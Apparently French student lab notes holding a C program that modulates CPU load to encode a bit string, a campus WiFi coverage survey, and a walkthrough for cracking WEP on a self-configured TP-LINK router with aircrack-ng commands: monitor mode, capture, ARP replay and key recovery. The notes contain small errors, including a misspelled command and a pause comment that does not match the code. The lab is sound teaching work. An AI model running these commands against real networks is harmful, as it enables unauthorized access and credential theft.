Code C

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <string.h>

void stress_cpu(int percentage, int duration) {
    struct timespec start, end;
    double cpu_time, sleep_time;
    
    cpu_time = percentage / 100.0;
    sleep_time = 1.0 - cpu_time;
    
    for (int i = 0; i < duration; ++i) {
        clock_gettime(CLOCK_MONOTONIC, &start);
        while (1) {
            clock_gettime(CLOCK_MONOTONIC, &end);
            if ((end.tv_sec - start.tv_sec) + (end.tv_nsec - start.tv_nsec) / 1000000000.0 >= cpu_time) {
                break;
            }
        }
        usleep(sleep_time * 1000000);
    }
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <binary_string>\n", argv[0]);
        return 1;
    }

    char *binary_string = argv[1];
    int length = strlen(binary_string);
    
    for (int i = 0; i < length; ++i) {
        if (binary_string[i] == '1') {
            printf("Stressing CPU at 100%% for 3 second...\n");
            stress_cpu(100, 3);
        } else if (binary_string[i] == '0') {
            printf("Stressing CPU at 50%% for 3 second...\n");
            stress_cpu(50, 3);
        } else {
            fprintf(stderr, "Invalid character '%c' in binary string. Only '0' and '1' are allowed.\n", binary_string[i]);
            return 1;
        }
        
        // Pause for 1 second between each bit
        printf("Pausing for 1 second...\n");
        sleep(3);
    }

    printf("CPU stress test completed.\n");
    return 0;
}

On met le téléphone au bonne endroit et on lance le programme avec le bon code binaire.

./data <binary_string>

Exemple de vidéo avec le str s

En se baladant dans le campus et en se connectant à différent Access Point (AP), on peut faire une cartographie du débit que l'on a. En effet, chaque AP va diffuser plus ou moins bien sur le WIFI sur différentes fréquences (2.4GHz et 5GHz). Ce que l'on peut retenir est que suivant les matériaux du bâtiment et l'énergie qu'à le WIFI (dépendant de sa fréquence), on captera plus ou moins bien le réseau. Donc potentiellement, on pourrait se mettre en dehors du bâtiment et pirater le WIFI pour s'y connecter et infiltrer le réseau. Il y a plusieurs paramètres que l'on peut mettre dans les bornes WIFI comme du MAC filtering (filtrage d'adresse MAC) ou bien mettre uniquement du 5GHz mais aussi de prévoir des matériaux ne laissant quasiment pas les ondes 5GHz de s'échapper. On peut nommer aussi la technologie LIFI https://fr.wikipedia.org/wiki/Li-Fi Cette techno va principalement utiliser la lumière et des ondes au bord des LEDS pour diffuser le réseau.

• Aller sur la page d'administration du TP-LINK 192.168.0.1 (admin admin)
• Aller dans la section Wireless et rentrer les paramètres et dans Wireless Security (sous menu)
• Sélectionner un WIFI vulnérable (WEP) et rentrer une clé (0123456789).
• Connecter des équipements sur le réseau WIFI avec le nom qu'on a donné au préalable.
• S'équiper de la suite Aircrack-ng et faire de la déauthentification d'équipement pour récupérer le handshake et donc pouvoir se connecter à la place de l'utilisateurs

De ce fait, on va pouvoir récupérer des creds et péter le réseau WIFI Wep.

Voici quelques informations concernant la sécurité WEP

WEP

Type - You can select one of following types,

    Automatic - Select Shared Key or Open System authentication type automatically based on the wireless station's capability and request.
    Shared Key - Select 802.11 Shared Key authentication.
    Open System - Select 802.11 Open System authentication.

WEP Key Format - You can select ASCII or Hexadecimal format. ASCII Format stands for any combination of keyboard characters in the specified length. Hexadecimal format stands for any combination of hexadecimal digits (0-9, a-f, A-F) in the specified length.

WEP Key settings - Select which of the four keys will be used and enter the matching WEP key information for your network in the selected key radio button. These values must be identical on all wireless stations in your network.

Key Type - You can select the WEP key length (64-bit, or 128-bit, or 152-bit.) for encryption. "Disabled" means this WEP key entry is invalid.

    For 64-bit encryption - You can enter 10 hexadecimal digits (any combination of 0-9, a-f, A-F, and null key is not permitted) or 5 ASCII characters.
    For 128-bit encryption - You can enter 26 hexadecimal digits (any combination of 0-9, a-f, A-F, and null key is not permitted) or 13 ASCII characters.
    For 152-bit encryption - You can enter 32 hexadecimal digits (any combination of 0-9, a-f, A-F, and null key is not permitted) or 16 ASCII characters.

Note: If you do not set the key, the wireless security function is still disabled even if you have selected Shared Key as Authentication Type. 

Voici les commandes dans notre cas que nous avons utilisé étape par étape :

sudo apt install aircrack-ng -y

On met son interface en mode moniteur (ça permettra à la carte d'écouter les réseaux wifi disponible et de faire différentes attaques)

sudo airmong-ng start wlo1mon #dans mon cas ma carte est la wlo1mon, à identifier avec iwconfig

sudo airodump-ng wlo1mon

sudo airodump-ng --bssid <BSSID du réseau cible> -c <le channel> -w capture wlo1mon

sudo aireplay-ng --arpreplay -b <BSSID du réseau cible> -h <MAC d'une machine AKA station> wlo1mon

sudo aircrack-ng -b <BSSID du réseau cible>  capture*.cap

Si jamais il secfault, essayer les fichiers.cap one by one